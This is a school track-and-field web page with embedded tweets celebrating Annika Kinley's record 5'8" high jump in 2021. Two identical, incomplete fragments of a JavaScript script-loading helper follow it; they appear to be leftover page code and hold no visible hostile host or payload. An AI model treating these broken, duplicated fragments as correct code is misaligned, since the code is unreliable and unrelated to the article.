Track
Annika Kinley sets a new school and district record clearing 5’8 to claim the outdoor record!
AWESOME JOB ANNIKA! #WESTPRIDE
Annika Kinley set a new school and district record for high jump yesterday at Kings. Kinley cleared 5’8 to claim the outdoor record! What a way to start her senior outdoor campaign!@gmcsports @westfirebirds @LWHSRedSea @jumpgirl03 @FirebirdTweets @LakotaWestAD pic.twitter.com/YvoGEj73Qw
— Lakota West Track & Field (@WestTrackField) March 31, 2021
DYK- in the history of Cincinnati Metro Girls Track and Field, only 11 girls have ever jumped 5’8”….. #SpecialAthlete 💥 @jumpgirl03 @westfirebirds @FirebirdTweets @LakotaSuper https://t.co/Ir2EzdG0Ie
— Scott Kaufman (@LakotaWestAD) March 31, 2021
Another great photograph by our very own Lou Spinazzola taken of Annika Kinley- High Jump Record Holder @jumpgirl03 #AAGF @westfirebirds @FirebirdTweets pic.twitter.com/PAs7OQn032
— Scott Kaufman (@LakotaWestAD) April 6, 2021
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();